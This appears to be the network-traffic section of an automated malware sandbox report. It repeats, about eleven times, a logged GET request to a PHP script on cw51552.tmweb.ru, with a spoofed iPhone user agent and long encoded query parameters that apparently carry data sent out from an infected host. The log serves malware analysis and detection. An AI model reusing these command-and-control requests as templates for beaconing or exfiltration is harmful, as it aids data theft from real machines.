Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
